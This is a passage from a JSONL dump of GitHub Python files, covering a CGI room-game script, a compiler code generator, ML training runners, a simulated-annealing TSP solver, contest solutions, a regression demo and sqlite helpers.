]\n)\n","repo_name":"themarathoncontinues/fantasy-analytics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2281248018","text":"#!/usr/bin/env python3\nimport sys\nimport csv\nimport cgi\n\ndef main():\n\tform=cgi.FieldStorage()\n\tinventory=form[\"inventory\"].value\n\tURL=form[\"URL\"].value #getting URL of their room\n\n\tint_list=[]\n\tfile1=open(\"./resources.csv\", \"r\")\n #parsing the contents of resources.csv and writing them into a list\n\tint_list=file1.read().split(',')\n\tint_list[2]=int_list[2].rstrip()\n\tint_list[0]=str(int(int_list[0]) - 1)\n\tfile1.close()\n\n\tfile2=open(\"./resources.csv\",\"w\").close() #empty csv file\n\n\tfile3=open(\"./resources.csv\",\"w\") #write to csv file\n\tfile3writer = csv.writer(file3, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)\n\tfile3writer.writerow([int_list[0]+\",\"+int_list[1]+\",\"+\"0\"]) #replacing the occupied status with 0\n\tfile3.close()\n\n\tprint (\"Content-type: text/html\\n\\n\")\n\tprint (\"\"\"\n \n
\n \n \n You may proceed to the next room.
\n \n
\n \"\"\" % (URL,inventory))\n\nmain()\n\n","repo_name":"TuOfTimes/TheBlueRoom","sub_path":"Room/success.py","file_name":"success.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13447179776","text":"\nfrom operator import truediv\nfrom Entorno.Retorno import Retorno, Tipos\nfrom AST.Instruccion.Statement import Statement\nfrom AST.Expresion.Expresion import Expresion\nfrom Entorno.TablaSimbolos import TablaSimbolos\nfrom AST.misc.Program import Program\nfrom AST.Instruccion.Instruccion import Instruccion\nfrom AST.Instruccion.Case import Case\nfrom Entorno.Retorno import Tipos\nfrom AST.misc.error import Error_\nfrom Generador import Generador\nfrom AST.misc.Display_obj import Display_obj\n\nclass Match(Instruccion):\n\n def __init__(self, condicion: Expresion, case_list, default, linea, columna):\n self.condicion = condicion\n self.case_list = case_list\n self.default = default\n self.linea = linea\n self.columna = columna\n\n\n def ejecutar3D(self, ts) -> Retorno:\n \n ts_local = TablaSimbolos(ts, \"MATCH\")\n ts_local.Display = ts.Display\n ts_local.ptr = ts.ptr\n ts_local.tamanio = ts.tamanio\n \n ETQ_SALIDA = Generador.obtenerEtiqueta()\n \n DISPLAY = Display_obj()\n DISPLAY.salida = ETQ_SALIDA\n ts.ptr += 1\n ts.Display[ts.ptr] = DISPLAY\n \n condicion = self.condicion.obtener3D(ts)\n # cond_temp = Generador.obtenerTemporal()\n \n SALIDA = \"/* INSTRUCCION MATCH */\\n\"\n SALIDA += condicion.codigo\n \n \n for case in self.case_list:\n found_etq = Generador.obtenerEtiqueta()\n next_etq = Generador.obtenerEtiqueta()\n \n SALIDA += \"/* CASE */\\n\"\n \n for exp in case.lista_exp:\n valor = exp.obtener3D(ts_local)\n SALIDA += valor.codigo\n SALIDA += f'if ( {condicion.temporal} == {valor.temporal}) goto {found_etq}; \\n'\n \n SALIDA += f'goto {next_etq};\\n'\n\n SALIDA += f'{found_etq}:\\n'\n SALIDA += case.codigo.ejecutar3D(ts_local)\n SALIDA += f'goto {ETQ_SALIDA};\\n'\n \n SALIDA += f'{next_etq}:\\n'\n\n if self.default is not None:\n SALIDA += \"/* DEFAULT */\\n\"\n SALIDA += self.default.ejecutar3D(ts_local)\n \n \n SALIDA += f'{ETQ_SALIDA}:\\n'\n \n return SALIDA\n \n \n \n \n \n ","repo_name":"Desquivel501/OLC2_Proyecto2_202010055","sub_path":"api/AST/Instruccion/Match.py","file_name":"Match.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44737068727","text":"import mock_github\n\nfrom base import MockPyGithubTests\nfrom lgtm import git\n\n\nclass GitTests(MockPyGithubTests):\n\n def test_get_team_members(self):\n mock_github.create_fake_org(teams=[mock_github.MockTeam('team1', ['bat', 'baz'])])\n git_hub = git.GitHub('foo', 'bar', 'bat')\n self.assertEquals(git_hub.get_team_members('OrgName/team1'), ['bat', 'baz'])\n\n def test_expand_teams(self):\n mock_github.create_fake_org(teams=[mock_github.MockTeam('team1', ['bat', 'baz'])])\n git_hub = git.GitHub('foo', 'bar', 'bat')\n self.assertEquals(\n sorted(git_hub.expand_teams(['foo', 'OrgName/team1'])),\n sorted(['foo', 'bat', 'baz']))\n","repo_name":"NerdWalletOSS/github-lgtm","sub_path":"lgtm/tests/test_git.py","file_name":"test_git.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"23134569242","text":"import fire\nimport torch\nimport numpy as np\n\nfrom torch.utils import data\nfrom torchvision import datasets, transforms\nfrom typing import Tuple, Dict, Callable\nfrom pathlib import Path\n\nfrom torch_harness import TorchHarness\nfrom baseline_models import ReLUNet, TanhNet, MaxoutNet\nfrom dilation_erosion import DenMoNet\n\ndata_dir = Path(__file__).parent / 'data'\nmodel_dir = Path(__file__).parent / 'models'\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n\n# Datasets\n\ndef load_cifar10() -> Tuple[data.Dataset, data.Dataset, int]:\n \"\"\"Load CIFAR-10 train, test, and size.\"\"\"\n trans = transforms.Compose([transforms.ToTensor()])\n train_set = datasets.CIFAR10(str(data_dir), train=True, download=True, transform=trans)\n test_set = datasets.CIFAR10(str(data_dir), train=False, download=True, transform=trans)\n return train_set, test_set, 32 * 32 * 3\n\n\ndef load_fashion_mnist() -> Tuple[data.Dataset, data.Dataset, int]:\n \"\"\"Load fashion MNIST train, test, and size.\"\"\"\n trans = transforms.Compose([transforms.ToTensor()])\n train_set = datasets.FashionMNIST(str(data_dir), train=True, download=True, transform=trans)\n test_set = datasets.FashionMNIST(str(data_dir), train=False, download=True, transform=trans)\n return train_set, test_set, 28 * 28\n\n\ndef load_mnist() -> Tuple[data.Dataset, data.Dataset, int]:\n \"\"\"Load MNIST train, test, and size.\"\"\"\n trans = transforms.Compose([transforms.ToTensor()])\n train_set = datasets.MNIST(str(data_dir), train=True, download=True, transform=trans)\n test_set = datasets.MNIST(str(data_dir), train=False, download=True, transform=trans)\n return train_set, test_set, 28 * 28\n\n\ndef load_circles() -> Tuple[data.Dataset, data.Dataset, int]:\n \"\"\"Load circles train, test, and size.\"\"\"\n training = np.load('data/circle_training.npy')\n test = np.load('data/circle_test.npy')\n train_set = data.TensorDataset(\n torch.FloatTensor(training[:, :-1]),\n torch.LongTensor(training[:, -1])\n )\n\n test_set = data.TensorDataset(\n torch.FloatTensor(test[:, :-1]),\n torch.LongTensor(test[:, -1])\n )\n\n return train_set, test_set, 2\n\n\ndef load_squares() -> Tuple[data.Dataset, data.Dataset, int]:\n \"\"\"Load squares train, test, and size.\"\"\"\n x = np.load('data/coordinates/squares_features.npy')\n y = np.load('data/coordinates/squares_labels.npy')\n train_set = data.TensorDataset(torch.from_numpy(x).float(), torch.from_numpy(y).long())\n test_set = data.TensorDataset(torch.from_numpy(x).float(), torch.from_numpy(y).long())\n return train_set, test_set, 2\n\n\ndataset_map: Dict[str, Callable] = {\n \"cifar10\": load_cifar10,\n \"fashion_mnist\": load_fashion_mnist,\n \"mnist\": load_mnist,\n \"circles\": load_circles,\n \"squares\": load_squares\n}\n\n# Models\n\nbaseline_model_map: Dict[str, Callable] = {\n 'relu': ReLUNet,\n 'tanh': TanhNet,\n 'maxout': MaxoutNet\n}\n\n\ndef run_and_save_model(model, train, test, epochs, name):\n harness = TorchHarness(model, model.name(name), train, test, epochs=epochs)\n harness.train_and_evaluate()\n model.store(name, model_dir)\n\n\n# Runners\n\ndef run_denmo(dset_name: str, erosions: int = 5, dilations: int = 5, epochs: int = 2):\n \"\"\"Run denmo on a dataset.\n\n Datasets:\n * mnist\n * fashion_mnist\n * cifar10\n \"\"\"\n train, test, size = dataset_map[dset_name]()\n model = DenMoNet(size, dilations, erosions, 10)\n run_and_save_model(model, train, test, epochs, dset_name)\n\n\ndef run_baseline(model_name: str, dset_name: str, h_layers: int = 200, epochs: int = 2):\n \"\"\"Run a baseline model on a dataset.\n\n Datasets:\n * mnist\n * fashion_mnist\n * cifar10\n\n Models:\n * relu\n * tanh\n * maxout\n \"\"\"\n train, test, size = dataset_map[dset_name]()\n model = baseline_model_map[model_name](size, h_layers)\n run_and_save_model(model, train, test, epochs, dset_name)\n\n\ndef predict_coordinates(path: str):\n # train, test, size = dataset_map[dset_name]()\n model = torch.load(path )\n model.eval()\n features = np.load('data/coordinates/coordinates.npy')\n coordinates = torch.from_numpy(features).to(device).float()\n predictions = model(coordinates).data.cpu().numpy()\n classes = predictions.argmax(axis=1)\n\n zero_coordinates = np.where(classes == 0)[0]\n one_coordinates = np.where(classes == 1)[0]\n\n from matplotlib import pyplot as plt\n fig, ax = plt.subplots()\n ax.plot(features[zero_coordinates, 0], features[zero_coordinates, 1], linestyle='None', marker='o')\n ax.plot(features[one_coordinates, 0], features[one_coordinates, 1], linestyle='None', marker='o')\n plt.show()\n\n\nif __name__ == '__main__':\n fire.Fire()\n","repo_name":"jlebensold/iclr_2019_buffalo-3","sub_path":"comparisons.py","file_name":"comparisons.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"71345413955","text":"from online_users.models import OnlineUserActivity\nfrom accounts.models import Account\nfrom orders.models import Order\n\n\ndef admin_index_processors(request):\n user_activity_objects = OnlineUserActivity.get_user_activities()\n number_of_active_users = user_activity_objects.count()\n\n total_users = (Account.objects.count())\n\n # Generating sales report\n ind_products = 0\n transactions = 0\n product_sales = {}\n order = Order.objects.all()\n # for o in order:\n # transactions += 1\n # items = o.orderitem_set.all()\n \n # for i in items:\n # print(str(i.product))\n # if str(i.product) not in product_sales:\n # product_sales[str(i.product)] = i.quantity\n # else:\n # product_sales[str(i.product)] = product_sales[str(i.product)] + i.quantity \n\n # print((product_sales)) \n\n # Find indv product sales\n for pv in product_sales.values():\n ind_products += int(pv) \n \n\n # print(ind_products)\n # print(transactions) \n \n context = {'online_users' : number_of_active_users, \n 'total_users' : total_users, \n 'ind_products' : ind_products, \n 'transactions' : transactions\n }\n return context","repo_name":"yogesh1234567890/smartbaje","sub_path":"smartbaje/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2822387319","text":"def show(x,y): #non default argument \n print(\"x \", x)\n print(\"y \", y)\n\nshow(10,20) #positional argument \n\nshow(x = 'x', y = 'k') # keyword argument\n#show(x =20, y = 30, z = 40)\n# positonal arguments should be before keyword argument\nshow(10, y = 20) \n","repo_name":"akashgkrishnan/learningPython","sub_path":"FUNS.py","file_name":"FUNS.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13253088276","text":"import pandas as pd\nimport numpy as np\nimport random\nimport math\nimport matplotlib as plot\n\n# Show full width of dataframe\npd.set_option('display.max_colwidth', None)\npd.set_option('display.max_row', None)\n# pd.set_option('display.max_rows', None)\n\n# Converting csv to data frame and adding headers\nheaders = ['X', 'Y']\ndata = pd.read_csv(\"TSP-Matrix.csv\", names=[\"X\",\"Y\"])\nprint(data)\n\n############## Step 1: Initial Solution: Based on either the random or greedy start\n\n# Create a list of 1 to 24 (cities) everytime one is appended to greedy_start one is removed from the list of cities array\ncities = list(range(0, 25))\ngreedy_start = []\n\ndef randomStart():\n random_route = random.sample(range(1, 25), 24)\n print(\"Random start:\", random_route)\n\ndef greedyStart(city1,city2):\n\n global current_city\n \n # Make current city the last visited city (num2)\n current_city = city2\n # Append and remove first and second items from greedy parameter\n appendRemove(city1)\n appendRemove(city2)\n \n # We want to go through the length of not chosen city list \n while len(cities) > 0:\n # Then we want to find the next best city according to the current city we are on\n next_city = findNext(current_city)\n # Add next best city stop off to the greedy start array and then remove it from the cities list\n appendRemove(next_city)\n next_city = current_city\n \n print(\"Greedy Start:\",greedy_start)\n \n \n############## Step 2: Neighbourhood operator: Inversion operation\n\ndef randomSwap(route):\n new_route = route.copy()\n city1 = random.randint(0, 24)\n city2 = random.randint(0, 24)\n # They must not be the same city as you can't swap these\n if city1 != city2:\n new_route[city1], new_route[city2] = new_route[city2], new_route[city1]\n else: # If they are the same then go to another city\n city1 -= 1\n new_route[city1], new_route[city2] = new_route[city2], new_route[city1]\n return new_route\n\n\n############## Step 3: Solution evaluation: Add the cost of travelling through the cities\n\n# Calculates the euclidean distance between 2 points \ndef calculatePath(city1, city2):\n \n # We need to find this number from the pandas dataframe but - 1\n # Shift index by -1 because index starts from 0 not 1\n city1_index = city1 - 1\n city2_index = city2 - 1\n \n # Find position of city within the DataFrame to calculate Euclidean distance between the 2 points for X, Y\n x_sq = ((data[\"X\"].iloc[city2_index] - data[\"X\"].iloc[city1_index])) ** 2\n y_sq = ((data[\"Y\"].iloc[city2_index] - data[\"Y\"].iloc[city1_index])) ** 2\n euclidean = x_sq + y_sq\n length = math.sqrt(euclidean)\n \n return length\n\n# Calculates the cost of the entire array of path/solution using euclidean distance\n\ndef calculateRoute(route):\n cost_total = 0\n # For each city \n for key, city in enumerate(route):\n # Find the index\n if route.index(city) < 24:\n # Then count up the cost from A -> B, B -> C etc\n this_city = route[key]\n next_city = route[key+1]\n cost_total = cost_total + calculatePath(this_city, next_city)\n else:\n # Then make sure we add on the cost of the last city back to the first\n cost_total = cost_total + calculatePath(route[23], route[0])\n\n return round(cost_total, 2)\n\n\ndef findNext(current):\n # Create a temp dict for current_city > next_city and all the length values\n city_costs = {}\n # Iterate through each item in cities array\n for index, each in enumerate(cities):\n # Calculate cost from current city to each city not visited\n path_cost = calculatePath(current, each)\n # Append each of these cities and their cost to a dictionary\n city_costs[each] = path_cost\n # Convert the dictionary into items and then a list \n city_costs = city_costs.items()\n list_city = list(city_costs)\n # Convert list into a DataFrame\n city_dataframe = pd.DataFrame(list_city)\n # Give DataFrame column names\n city_dataframe.columns = [\"City\",\"Cost\"]\n # Pick the smallest cost\n min_cost = city_dataframe.loc[city_dataframe.Cost == city_dataframe.Cost.min(), 'City'].values[0]\n # Return the city with the minimum cost\n return min_cost\n\n \ndef appendRemove(city):\n # Every time we append a new city to new solution path we must pop it from cities array.\n greedy_start.append(city)\n cities.remove(city)\n\n############## Step 4: Stopping criteria: When temperature T reaches to Tmin. Tmax = 10.00 /Tmi n = 0.0005 / alpha = 0.995\n\n\n# Create a function with parametres current cost, new cost, temperature \ndef acceptanceProbability(current,new,temperature):\n # If the new solution is better, accept it\n currentCost = calculateRoute(current)\n newCost = calculateRoute(new)\n \n # Calculate the acceptance probability\n accepted = math.exp((currentCost - newCost) / temperature)\n return accepted\n\n\n############### CONFIGURATIONS ###############\n\n# Maximimum temperature it starts at \ncurrent_temp = 5.00\n# Minimum temperature it stops at \ntemp_min = 0.001\n# The rate of reduction\nalpha = 0.9\n# Iteration s\ntotal_iterations = 1\niteration_index = 0\ncounter = 0\n\n# Create an array with all the costs\nsolution_costs = {}\n\n\n# Setting up the greedy start solution \ngreedyStart(4,8)\ngreedy_cost = calculateRoute(greedy_start)\nprint(\"Greedy cost:\", greedy_cost)\n# Or choose randomStart() \n\nstart_route = greedy_start\nbest_route = greedy_start\n\n# while iteration is equal to or less than total iterations needed per \"temperature leve\"\nwhile iteration_index <= total_iterations: \n # Generate a new neighbour by swapping adjacent\n new_route = randomSwap(start_route)\n # Calculate cost \n current_cost = calculateRoute(best_route)\n new_route_cost = calculateRoute(new_route)\n\n # If new neighbour costs less than current best route accept that is the best route \n if new_route_cost < current_cost:\n best_route = new_route\n # print(\"FIrst pick best route\", best_route, \"Cost\", calculateRoute(best_route))\n # IF new neighbour costs more than current best route calculate the probability \n else:\n new_probability = acceptanceProbability(best_route, new_route, current_temp)\n # Generate random number between 0 and 1 \n random_number = random.uniform(0,1)\n # If random number < probability = accept move and change to best_route\n if random_number < new_probability:\n best_route = new_route\n print(\"New route best route\", best_route, \"Cost\", calculateRoute(best_route))\n\n # If we have run through all iterations\n if iteration_index == total_iterations:\n # Then we should reduce temperature\n current_temp = current_temp * alpha\n # And reset the counter \n iteration_index = 0\n # print(\"test\")\n else:\n iteration_index += 1\n # print(\"test 2\")\n counter += 1 \n print(\"Solution \" + str(counter), best_route, \"Cost:\", calculateRoute(best_route))\n \n # Append all costs to a dict\n solution_costs[counter] = calculateRoute(best_route)\n\n \n ####### STOPPING CRITERIA #######\n if current_temp < temp_min:\n break\n\nsolution_cost = solution_costs.items()\nlist_of_solutions = list(solution_cost)\n# Convert list into a DataFrame\nsolution_df = pd.DataFrame(list_of_solutions)\n# Give DataFrame column names\nsolution_df.columns = [\"Solution\",\"Cost\"]\n\nprint(\"Overall best solution:\", best_route, \"\\nCost:\", calculateRoute(best_route))\nprint(\"Total iterations:\", counter) \n\n######### Draw graphs\nsolution_df.plot.line(x=0, y=1, style='-o',marker='x', figsize=(20, 10));\nsolution_df.plot()","repo_name":"LoveBexa/applied-ai","sub_path":"Simulated Annealing/simulated-annealing.py","file_name":"simulated-annealing.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23574521431","text":"import time\r\nimport logging\r\nfrom ortools.linear_solver import pywraplp\r\n\r\n\r\ndef solve_fashion(n, board, m):\r\n solver = pywraplp.Solver('SolveQueen',\r\n pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)\r\n circles = [[] for _ in range(n)]\r\n crosses = [[] for _ in range(n)]\r\n plusses = [[] for _ in range(n)]\r\n\r\n preplaced_constraints = [None] * m\r\n pc_idx = 0\r\n objective = solver.Objective()\r\n for i in range(n):\r\n circles[i] = [None for _ in range(n)]\r\n crosses[i] = [None for _ in range(n)]\r\n plusses[i] = [None for _ in range(n)]\r\n for j in range(n):\r\n circle_value = 0\r\n if board[i][j] == 'o':\r\n circle_value = 1\r\n circles[i][j] = solver.IntVar(circle_value, 1,\r\n \"O:r\" + str(i) + \"c\" + str(j))\r\n crosses[i][j] = solver.IntVar(0, 1, \"X:r\" + str(i) + \"c\" + str(j))\r\n plusses[i][j] = solver.IntVar(0, 1, \"+:r\" + str(i) + \"c\" + str(j))\r\n if board[i][j] == 'x':\r\n preplaced_constraints[pc_idx] = solver.Constraint(1, 1)\r\n preplaced_constraints[pc_idx].SetCoefficient(circles[i][j], 1)\r\n preplaced_constraints[pc_idx].SetCoefficient(crosses[i][j], 1)\r\n if board[i][j] == '+':\r\n preplaced_constraints[pc_idx] = solver.Constraint(1, 1)\r\n preplaced_constraints[pc_idx].SetCoefficient(circles[i][j], 1)\r\n preplaced_constraints[pc_idx].SetCoefficient(plusses[i][j], 1)\r\n\r\n\r\n objective.SetCoefficient(circles[i][j], 2.001)\r\n objective.SetCoefficient(crosses[i][j], 1)\r\n objective.SetCoefficient(plusses[i][j], 1)\r\n objective.SetMaximization()\r\n\r\n row_constraints = [None] * n\r\n for i in range(0, n):\r\n row_constraints[i] = solver.Constraint(1, 1)\r\n for j in range(0, n):\r\n row_constraints[i].SetCoefficient(circles[i][j], 1)\r\n row_constraints[i].SetCoefficient(crosses[i][j], 1)\r\n\r\n col_constraints = [None] * n\r\n for i in range(0, n):\r\n col_constraints[i] = solver.Constraint(1, 1)\r\n for j in range(0, n):\r\n col_constraints[i].SetCoefficient(circles[j][i], 1)\r\n col_constraints[i].SetCoefficient(crosses[j][i], 1)\r\n\r\n inc_diag_constraints = {}\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n if i + j not in inc_diag_constraints:\r\n inc_diag_constraints[i + j] = solver.Constraint(0, 1)\r\n inc_diag_constraints[i + j].SetCoefficient(circles[i][j], 1)\r\n inc_diag_constraints[i + j].SetCoefficient(plusses[i][j], 1)\r\n\r\n dec_diag_constraints = {}\r\n for i in range(0, n):\r\n for j in range(0, n):\r\n if i - j not in dec_diag_constraints:\r\n dec_diag_constraints[i - j] = solver.Constraint(0, 1)\r\n dec_diag_constraints[i - j].SetCoefficient(circles[i][j], 1)\r\n dec_diag_constraints[i - j].SetCoefficient(plusses[i][j], 1)\r\n\r\n # Solve!\r\n status = solver.Solve()\r\n if status == solver.OPTIMAL:\r\n style = 0\r\n\r\n changed = []\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n if circles[i][j].solution_value() == 1:\r\n if board[i][j] != 'o':\r\n changed.append(('o', i, j))\r\n style += 2\r\n # print('O ', end='')\r\n elif crosses[i][j].solution_value() == 1:\r\n if board[i][j] != 'x':\r\n changed.append(('x', i, j))\r\n style += 1\r\n # print('X ', end='')\r\n elif plusses[i][j].solution_value() == 1:\r\n if board[i][j] != '+':\r\n changed.append(('+', i, j))\r\n style += 1\r\n # print('+ ', end='')\r\n else:\r\n pass\r\n # print('_ ', end='')\r\n # print()\r\n return style, changed\r\n else: # No optimal solution was found.\r\n if status == solver.FEASIBLE:\r\n print('A potentially suboptimal solution was found.')\r\n else:\r\n print('The solver could not solve the problem.')\r\n\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig(level=logging.DEBUG,\r\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\r\n datefmt='%m-%d %H:%M',\r\n filename='logs/log-{}.log'.format(time.time()),\r\n filemode='w')\r\n console = logging.StreamHandler()\r\n console.setLevel(logging.INFO)\r\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\r\n console.setFormatter(formatter)\r\n logging.getLogger('').addHandler(console)\r\n\r\n total_elapsed_time = 0\r\n\r\n t = int(input())\r\n for test in range(1, t + 1):\r\n logging.info('Test #{}/{} started'.format(test, t))\r\n start_time = time.time()\r\n n, m = [int(s) for s in input().split(\" \")]\r\n\r\n board = [[] for x in range(n)]\r\n for x in range(n):\r\n board[x] = [None for _ in range(n)]\r\n\r\n for j in range(m):\r\n type, i, j = [s for s in input().split(\" \")]\r\n i = int(i) - 1\r\n j = int(j) - 1\r\n board[i][j] = type\r\n\r\n style, changed = solve_fashion(n, board, m)\r\n\r\n print(\"Case #{}: {} {}\".format(test, style, len(changed)))\r\n for c in changed:\r\n print(\"{} {} {}\".format(c[0], c[1] + 1, c[2] + 1))\r\n\r\n elapsed = time.time() - start_time\r\n total_elapsed_time += elapsed\r\n logging.info('Test #{}/{} ended. Time: {:.2f}'.format(test, t, elapsed))\r\n logging.info('Elapsed time: {:.2f}, Expected Total: {:.2f}'.format(\r\n total_elapsed_time,\r\n total_elapsed_time + (total_elapsed_time / test) * (t - test))\r\n )\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_202/87.py","file_name":"87.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20368845616","text":"import sys\ninput=sys.stdin.readline\n\nN=int(input())\nnum_list=list(map(int,input().split())) #숫자의 배열을 리스트로 입력받는다.\nNGE=[-1]*N #오큰수가 없는 경우는 -1로 출력함으로 -1로 배열의 크기만큼 초기화 해둔다.\nstack=[] #인덱스를 저장할 스택을 만든다.\nfor i in range(N):\n while stack and num_list[stack[-1]] < num_list[i]: #스택이 비어있지 않거나 스택의 가장 윗번째 수가 i번째 수보다 작다면 지금까지 스택에 있던 수들의 오큰수는 i번째 수이다.\n NGE[stack.pop()]=num_list[i] #스택에 있는 수들의 오큰수는 모두 i번째 수가 된다.\n stack.append(i) #while문에 조건에 충족하지 않는다면 인덱스를 stack에 추가한다.\nprint(*NGE) #NGE를 출력한다. (*list_name)을 출력하면 리스트안에 있는 것들이 공백으로 구분되어 출력된다.\n","repo_name":"Jeongmani/python-study","sub_path":"BOJ/Class 4/오큰수(17298).py","file_name":"오큰수(17298).py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12084089463","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport pylab as pl\nimport numpy as np\n\ndf = pd.read_csv('FuelConsumptionCo2.csv')\ncdf = df[['ENGINESIZE','CYLINDERS','FUELCONSUMPTION_COMB','CO2EMISSIONS']]\nprint(cdf.head())\n#viz = cdf[['CYLINDERS','ENGINESIZE','CO2EMISSIONS','FUELCONSUMPTION_COMB']]\n#print(viz.head())\n#viz.hist()\n#plt.show()\n\n\n'''plt.scatter(cdf.ENGINESIZE, cdf.CO2EMISSIONS, color='blue')\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"Emission\")\nplt.show()'''\n\n#Step1: Create data test\n#Create mask (mặt nạ)\nmsk = np.random.rand(len(df))<0.8\n\ntrain=cdf[msk]\nprint(\"Size of train data: \",len(train))\ntest=cdf[~msk]\nprint(\"Size of test data: \",len(test))\n\n#Step2: Modeling\nfrom sklearn import linear_model\nregr = linear_model.LinearRegression()\nprint(\"Shape before convert: \",train[['ENGINESIZE']].shape,type(train[['ENGINESIZE']]))\ntrain_x = np.asanyarray(train[['ENGINESIZE']])\nprint(\"Shape after convert: \",train_x.shape,type(train_x))\ntrain_y = np.asanyarray(train[['CO2EMISSIONS']])\nregr.fit (train_x,train_y)\n\n# The coefficients y_predict = theta_0 + theta_1 * x\nprint ('Coefficients: ', regr.coef_) #theta_0\nprint ('Intercept: ',regr.intercept_)#theta_1\n\nplt.scatter(train.ENGINESIZE,train.CO2EMISSIONS,color=\"blue\")\nplt.plot(train_x,regr.intercept_[0]+regr.coef_[0][0]*train_x,'-r')\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"Emission\")\nplt.show()\n\n#Evaluation\nfrom sklearn.metrics import r2_score\n\ntest_x = np.asanyarray(test[['ENGINESIZE']])\ntest_y = np.asanyarray(test[['CO2EMISSIONS']])\ntest_y_predict = regr.predict(test_x)\n\nprint(\"Mean absolute error: %.2f\" % np.mean(np.absolute(test_y_predict - test_y)))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((test_y_predict - test_y) ** 2))\nprint(\"R2-score: %.2f\" % r2_score(test_y , test_y_predict))","repo_name":"ndtands/practiceAI","sub_path":"ML/Regression/simple-linear-regression.py","file_name":"simple-linear-regression.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5700477366","text":"# SW Expert Academy - 10200번. 구독자 전쟁\n\nT = int(input())\n\nfor tc in range(1, T + 1):\n N, A, B = map(int, input().split())\n min_val, max_val = 987654321, 0\n min_val = (A + B) - N # 두 수를 합하고 전체 인원 N을 뺐을 때 0보다 크다면 최소 그 인원 수가 둘 다 구독한다는 의미\n if min_val < 0: # 0보다 작다면 최소 인원은 0\n min_val = 0\n max_val = min(A, B)\n print('#{} {} {}'.format(tc, max_val, min_val))\n","repo_name":"wnstj-yang/Algorithm","sub_path":"SWEA/D3/SWEA_10200.py","file_name":"SWEA_10200.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23414173221","text":"lineNumber = 0\ncards = []\nresult = []\nfor line in open(\"A-small-attempt0.in\"):\n\tlineNumber += 1\n\n\tif lineNumber == 1:\n\t\tcontinue;\n\n\tif (lineNumber - 2) % 5 == 0:\n\t\tsecondChoice = int(line)\n\t\tcards = []\n\n\t\tif (lineNumber - 2) % 10 == 0:\n\t\t\tfirstChoice = int(line)\n\t\t\tsecondChoice = 0\n\n\t\tcontinue;\n\n\tcards.append(map(lambda x: int(x.strip()), line.split(\" \")))\n\tif len(cards) == 4:\n\t\tif secondChoice == 0:\n\t\t\tfirstChoiceCards = cards[firstChoice - 1]\n\t\telse:\n\t\t\tsecondChoiceCards = cards[secondChoice - 1]\n\t\t\tcommonCards = set(firstChoiceCards) & set(secondChoiceCards)\n\t\t\tprint(firstChoiceCards, secondChoiceCards, commonCards)\n\t\t\tif len(commonCards) == 1:\n\t\t\t\tresult.append(commonCards.pop())\n\t\t\telif len(commonCards) == 0:\n\t\t\t\tresult.append(\"Volunteer cheated!\")\n\t\t\telse:\n\t\t\t\tresult.append(\"Bad magician!\")\n\n\tprint(\"cards: %s\" % cards)\n\tprint(\"firstChoice: %s\" % firstChoice)\n\tprint(\"secondChoice: %s\" % secondChoice)\n\tprint(result)\n\noutput = open(\"output.txt\", \"w\")\nfor i in range(len(result)):\n\toutput.write(\"Case #%s: %s\\n\" % (i + 1, result[i]))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/2574.py","file_name":"2574.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2850234128","text":"import sqlite3\nfrom config import database\nimport os\nfrom shapely.geometry import Polygon\n\n\ndef commit_db(sql, args=()):\n if not os.path.exists(database):\n connection = sqlite3.connect(database)\n connection.close()\n connection = sqlite3.connect(database)\n cursor = connection.cursor()\n cursor.execute(sql, args)\n connection.commit()\n connection.close()\n return\n\n\ndef query_db(query, args=()):\n connection = sqlite3.connect(database)\n cur = connection.cursor().execute(query, args)\n return cur.fetchall()\n\n\ndef commit_many(sql, data):\n connection = sqlite3.connect(database)\n cursor = connection.cursor()\n cursor.executemany(sql, data)\n connection.commit()\n connection.close()\n return\n\n\ndef new_table(entity):\n if entity == 'Nodes':\n commit_db('DROP TABLE IF 